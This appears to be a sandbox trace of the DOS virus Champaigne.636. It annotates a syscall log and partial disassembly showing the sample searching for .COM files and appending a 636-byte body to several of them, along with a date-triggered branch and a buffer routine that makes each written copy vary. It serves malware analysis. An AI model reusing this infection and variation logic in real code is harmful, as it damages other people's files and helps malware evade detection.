Sample viewer

vx.netlux.org/Virus.DOS.Champaigne.636


Syscalls:

Time Syscall Op Syscall Name
; Disassembly listed after the "Get date" trace row (op 42 decimal = INT 21h AH=2Ah).
; For AH=2Ah DOS returns DL = day of month, DH = month, AL = day of week.
; NOTE(review): this is a linear listing, not an executed path. It continues past the
; unconditional jmp at 0x14118, so 0x1411b onward is reached from somewhere not shown here.
; NOTE(review): bp is used as a base for every data reference, so the code looks
; position-independent (offsets relative to where the body was loaded) - confirm against the full sample.
2018-12-17T22:41:58.727071856Z 42 PC: 140f4 | Get date 0x140f4: mov byte ptr ds:[bp + 0x336], dl  ; save day of month
0x140f9: mov byte ptr ds:[bp + 0x335], dh  ; save month
0x140fe: mov byte ptr ds:[bp + 0x334], al  ; save AL from the call (day of week for AH=2Ah); read again at 0x141d9
0x14103: cmp al, 0
0x14105: je 0x14111  ; AL == 0: skip the 4-byte copy below
0x14107: mov di, 0x100  ; destination offset 0x100 - where a .COM image begins
0x1410a: lea si, word ptr [bp + 0x29e]  ; source: 4 bytes kept at bp+0x29e
0x1410e: push di  ; leaves 0x100 on the stack; the consumer is not in this excerpt
0x1410f: movsw word ptr es:[di], word ptr [si]  ; two word moves = 4 bytes to es:0x100..0x103
0x14110: movsw word ptr es:[di], word ptr [si]  ; presumably the host's original first 4 bytes (the trace reads/writes 4 bytes per file) - TODO confirm
0x14111: lea dx, word ptr [bp + 0x356]  ; DX = address of a buffer inside the body's own data
0x14115: call 0x14229  ; callee not listed; the next trace row (op 26, Set disk transfer address, PC 1422d) lies just past this address
0x14118: jmp 0x14214  ; the Find first file row (PC 1421f) follows shortly after this target
0x1411b: cmp byte ptr ds:[bp + 0x336], 0x1b  ; saved day of month == 27 ?
0x14121: jne 0x1412e
0x14123: call 0x14155  ; callee not listed in this excerpt
0x14126: cmp byte ptr ds:[bp + 0x335], 6  ; saved month == 6 ?
0x1412c: je 0x1414c  ; date-dependent branch; target not listed, so a run on another date may show different behaviour
0x1412e: mov dx, 0x80  ; 0x80 = default DTA offset in the PSP
0x14131: call 0x14229  ; same callee as 0x14115; consistent with the second Set disk transfer address row after the last Find next file
2018-12-17T22:41:58.731143862Z 26 PC: 1422d | Set disk transfer address
2018-12-17T22:41:58.732403242Z 78 PC: 1421f | Find first file
2018-12-17T22:41:58.738468503Z 67 PC: 14173 | Get or set file attributes
2018-12-17T22:41:58.744372918Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.262991873Z 61 PC: 1417f | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:41:59.269518521Z 87 PC: 14185 | Get or set file date and time
2018-12-17T22:41:59.271146904Z 63 PC: 14192 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:41:59.278089608Z 66 PC: 14233 | Move file pointer
2018-12-17T22:41:59.279706693Z 66 PC: 14233 | Move file pointer
2018-12-17T22:41:59.281325034Z 64 PC: 1426e | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:41:59.284306682Z 66 PC: 14233 | Move file pointer
; Disassembly listed after the "Get time" trace row (op 44 decimal = INT 21h AH=2Ch).
; For AH=2Ch DOS returns CH = hour, CL = minute, DH = second, DL = hundredths.
; The code assembles a buffer at bp+0x381 from three pieces: 0x12 bytes from bp+0x343,
; then either 0xd bytes from bp+0x25d or 0xb bytes from bp+0x160, then the same 0x12 bytes again.
; NOTE(review): a time-derived word is stored 2 bytes below the copied 0x12-byte block, so the
; written copy may differ between infections; a signature on the written body alone may not match - TODO confirm.
2018-12-17T22:41:59.285589334Z 44 PC: 141c5 | Get time 0x141c5: mov word ptr ds:[bp + 0x341], dx  ; save DX (seconds:hundredths); its use is not shown here
0x141ca: mov cx, 0x12  ; piece length: 18 bytes
0x141cd: lea di, word ptr [bp + 0x381]  ; destination buffer
0x141d1: lea si, word ptr [bp + 0x343]  ; source of the 18-byte piece
0x141d5: push cx  ; keep count and source for the repeat copy at 0x141f8
0x141d6: push si
0x141d7: rep movsb byte ptr es:[di], byte ptr [si]  ; first copy; DI ends just past it (assuming DF is clear)
0x141d9: cmp byte ptr ds:[bp + 0x334], 0  ; byte saved from AL at 0x140fe selects the middle piece
0x141df: jne 0x141ed
0x141e1: mov cx, 0xd  ; flag == 0: 13-byte piece
0x141e4: lea si, word ptr [bp + 0x25d]
0x141e8: rep movsb byte ptr es:[di], byte ptr [si]
0x141ea: jmp 0x141f6
0x141ec: nop
0x141ed: mov cx, 0xb  ; flag != 0: 11-byte piece
0x141f0: lea si, word ptr [bp + 0x160]
0x141f4: rep movsb byte ptr es:[di], byte ptr [si]
0x141f6: pop si  ; restore source and count of the 18-byte piece
0x141f7: pop cx
0x141f8: rep movsb byte ptr es:[di], byte ptr [si]  ; second copy of the same 18 bytes, appended after the middle piece
; NOTE(review): the 636-byte write in the next trace row reports PC 1437f, outside the addresses listed
; here; it may execute from the buffer just assembled - cannot be confirmed from this listing.
2018-12-17T22:41:59.287916537Z 64 PC: 1437f | Write file or device (Write 636 bytes on handle 5)
2018-12-17T22:41:59.297292991Z 87 PC: 14207 | Get or set file date and time
2018-12-17T22:41:59.298581443Z 62 PC: 1420b | Close file
2018-12-17T22:41:59.307172277Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.318568948Z 79 PC: 1421f | Find next file
2018-12-17T22:41:59.321010295Z 67 PC: 14173 | Get or set file attributes
2018-12-17T22:41:59.326641825Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.337333272Z 61 PC: 1417f | Open file (Filename = 'PRINT.COM')
2018-12-17T22:41:59.348220084Z 87 PC: 14185 | Get or set file date and time
2018-12-17T22:41:59.349590585Z 63 PC: 14192 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:41:59.356940101Z 87 PC: 14207 | Get or set file date and time
2018-12-17T22:41:59.358407611Z 62 PC: 1420b | Close file
2018-12-17T22:41:59.365508022Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.37579519Z 79 PC: 1421f | Find next file
2018-12-17T22:41:59.378330029Z 67 PC: 14173 | Get or set file attributes
2018-12-17T22:41:59.383647129Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.39351331Z 61 PC: 1417f | Open file (Filename = 'HELLO.COM')
2018-12-17T22:41:59.40460417Z 87 PC: 14185 | Get or set file date and time
2018-12-17T22:41:59.405928262Z 63 PC: 14192 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:41:59.411982257Z 66 PC: 14233 | Move file pointer
2018-12-17T22:41:59.413588095Z 66 PC: 14233 | Move file pointer
2018-12-17T22:41:59.415125504Z 64 PC: 1426e | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:41:59.417941022Z 66 PC: 14233 | Move file pointer
; Same routine as at the earlier "Get time" row (op 44 decimal = INT 21h AH=2Ch), listed again for this file.
; For AH=2Ch DOS returns CH = hour, CL = minute, DH = second, DL = hundredths.
; Builds a buffer at bp+0x381: 0x12 bytes from bp+0x343, then 0xd bytes from bp+0x25d or
; 0xb bytes from bp+0x160, then the same 0x12 bytes again.
2018-12-17T22:41:59.425762105Z 44 PC: 141c5 | Get time 0x141c5: mov word ptr ds:[bp + 0x341], dx  ; save DX (seconds:hundredths); its use is not shown here
0x141ca: mov cx, 0x12  ; piece length: 18 bytes
0x141cd: lea di, word ptr [bp + 0x381]  ; destination buffer
0x141d1: lea si, word ptr [bp + 0x343]  ; source of the 18-byte piece
0x141d5: push cx  ; keep count and source for the repeat copy at 0x141f8
0x141d6: push si
0x141d7: rep movsb byte ptr es:[di], byte ptr [si]  ; first copy (assuming DF is clear)
0x141d9: cmp byte ptr ds:[bp + 0x334], 0  ; byte saved from AL after Get date selects the middle piece
0x141df: jne 0x141ed
0x141e1: mov cx, 0xd  ; flag == 0: 13-byte piece
0x141e4: lea si, word ptr [bp + 0x25d]
0x141e8: rep movsb byte ptr es:[di], byte ptr [si]
0x141ea: jmp 0x141f6
0x141ec: nop
0x141ed: mov cx, 0xb  ; flag != 0: 11-byte piece
0x141f0: lea si, word ptr [bp + 0x160]
0x141f4: rep movsb byte ptr es:[di], byte ptr [si]
0x141f6: pop si  ; restore source and count of the 18-byte piece
0x141f7: pop cx
0x141f8: rep movsb byte ptr es:[di], byte ptr [si]  ; second copy of the same 18 bytes
2018-12-17T22:41:59.428130133Z 64 PC: 1437f | Write file or device (Write 636 bytes on handle 5)
2018-12-17T22:41:59.436188969Z 87 PC: 14207 | Get or set file date and time
2018-12-17T22:41:59.438230129Z 62 PC: 1420b | Close file
2018-12-17T22:41:59.445392968Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.454819809Z 79 PC: 1421f | Find next file
2018-12-17T22:41:59.457882745Z 67 PC: 14173 | Get or set file attributes
2018-12-17T22:41:59.463566056Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.469582836Z 61 PC: 1417f | Open file (Filename = 'PHANG.COM')
2018-12-17T22:41:59.483971653Z 87 PC: 14185 | Get or set file date and time
2018-12-17T22:41:59.485403668Z 63 PC: 14192 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:41:59.49262692Z 87 PC: 14207 | Get or set file date and time
2018-12-17T22:41:59.494964761Z 62 PC: 1420b | Close file
2018-12-17T22:41:59.502261361Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.508959006Z 79 PC: 1421f | Find next file
2018-12-17T22:41:59.511575119Z 67 PC: 14173 | Get or set file attributes
2018-12-17T22:41:59.515243743Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.521564187Z 61 PC: 1417f | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:41:59.530547927Z 87 PC: 14185 | Get or set file date and time
2018-12-17T22:41:59.531902657Z 63 PC: 14192 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:41:59.537558378Z 87 PC: 14207 | Get or set file date and time
2018-12-17T22:41:59.540822708Z 62 PC: 1420b | Close file
2018-12-17T22:41:59.549326489Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.561980385Z 79 PC: 1421f | Find next file
2018-12-17T22:41:59.56516052Z 67 PC: 14173 | Get or set file attributes
2018-12-17T22:41:59.571098284Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.579841504Z 61 PC: 1417f | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:41:59.584718917Z 87 PC: 14185 | Get or set file date and time
2018-12-17T22:41:59.585829293Z 63 PC: 14192 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:41:59.590933829Z 66 PC: 14233 | Move file pointer
2018-12-17T22:41:59.592879561Z 66 PC: 14233 | Move file pointer
2018-12-17T22:41:59.594140639Z 64 PC: 1426e | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:41:59.596829019Z 66 PC: 14233 | Move file pointer
; Same routine as at the earlier "Get time" rows (op 44 decimal = INT 21h AH=2Ch), listed again for this file.
; For AH=2Ch DOS returns CH = hour, CL = minute, DH = second, DL = hundredths.
; Builds a buffer at bp+0x381: 0x12 bytes from bp+0x343, then 0xd bytes from bp+0x25d or
; 0xb bytes from bp+0x160, then the same 0x12 bytes again.
2018-12-17T22:41:59.599224141Z 44 PC: 141c5 | Get time 0x141c5: mov word ptr ds:[bp + 0x341], dx  ; save DX (seconds:hundredths); its use is not shown here
0x141ca: mov cx, 0x12  ; piece length: 18 bytes
0x141cd: lea di, word ptr [bp + 0x381]  ; destination buffer
0x141d1: lea si, word ptr [bp + 0x343]  ; source of the 18-byte piece
0x141d5: push cx  ; keep count and source for the repeat copy at 0x141f8
0x141d6: push si
0x141d7: rep movsb byte ptr es:[di], byte ptr [si]  ; first copy (assuming DF is clear)
0x141d9: cmp byte ptr ds:[bp + 0x334], 0  ; byte saved from AL after Get date selects the middle piece
0x141df: jne 0x141ed
0x141e1: mov cx, 0xd  ; flag == 0: 13-byte piece
0x141e4: lea si, word ptr [bp + 0x25d]
0x141e8: rep movsb byte ptr es:[di], byte ptr [si]
0x141ea: jmp 0x141f6
0x141ec: nop
0x141ed: mov cx, 0xb  ; flag != 0: 11-byte piece
0x141f0: lea si, word ptr [bp + 0x160]
0x141f4: rep movsb byte ptr es:[di], byte ptr [si]
0x141f6: pop si  ; restore source and count of the 18-byte piece
0x141f7: pop cx
0x141f8: rep movsb byte ptr es:[di], byte ptr [si]  ; second copy of the same 18 bytes
2018-12-17T22:41:59.60173429Z 64 PC: 1437f | Write file or device (Write 636 bytes on handle 5)
2018-12-17T22:41:59.611069349Z 87 PC: 14207 | Get or set file date and time
2018-12-17T22:41:59.613207088Z 62 PC: 1420b | Close file
2018-12-17T22:41:59.62143023Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.636666998Z 79 PC: 1421f | Find next file
2018-12-17T22:41:59.639935958Z 67 PC: 14173 | Get or set file attributes
2018-12-17T22:41:59.645379701Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.669849624Z 61 PC: 1417f | Open file (Filename = 'PAH.COM')
2018-12-17T22:41:59.678134855Z 87 PC: 14185 | Get or set file date and time
2018-12-17T22:41:59.679582279Z 63 PC: 14192 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:41:59.685903745Z 87 PC: 14207 | Get or set file date and time
2018-12-17T22:41:59.687930436Z 62 PC: 1420b | Close file
2018-12-17T22:41:59.69762307Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.707302058Z 79 PC: 1421f | Find next file
2018-12-17T22:41:59.710337592Z 67 PC: 14173 | Get or set file attributes
2018-12-17T22:41:59.715843866Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.725335848Z 61 PC: 1417f | Open file (Filename = 'TEST.COM')
2018-12-17T22:41:59.731647641Z 87 PC: 14185 | Get or set file date and time
2018-12-17T22:41:59.732847138Z 63 PC: 14192 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:41:59.736949152Z 87 PC: 14207 | Get or set file date and time
2018-12-17T22:41:59.738829833Z 62 PC: 1420b | Close file
2018-12-17T22:41:59.744706926Z 67 PC: 1427e | Get or set file attributes
2018-12-17T22:41:59.752244139Z 79 PC: 1421f | Find next file
2018-12-17T22:41:59.754635959Z 26 PC: 1422d | Set disk transfer address
2018-12-17T22:41:59.755630666Z 48 PC: 12a63 | Get DOS version
2018-12-17T22:41:59.756497352Z 9 PC: 12a7a | Display string (String= ' --=[ Selfchecking AntiStealth Goat COM/EXE file, 01/06/01 ]=------------------ (c) 1995-2001 by ROSE SWE, Dipl.-Ing. Ralph Roth - Version 1.18 - Freeware ')
2018-12-17T22:41:59.762188341Z 61 PC: 12cb7 | Open file (Filename = '')
2018-12-17T22:41:59.767592257Z 9 PC: 12a88 | Display string (String= 'Self test: ')
2018-12-17T22:41:59.769297765Z 93 PC: 12b24 | File sharing functions
2018-12-17T22:41:59.771281692Z 9 PC: 12b03 | Display string (String= 'Size change=+027Ch/00636d. Virus might be activ? ')
2018-12-17T22:41:59.774939977Z 76 PC: 12b09 | Terminate with return code (Return code = '1')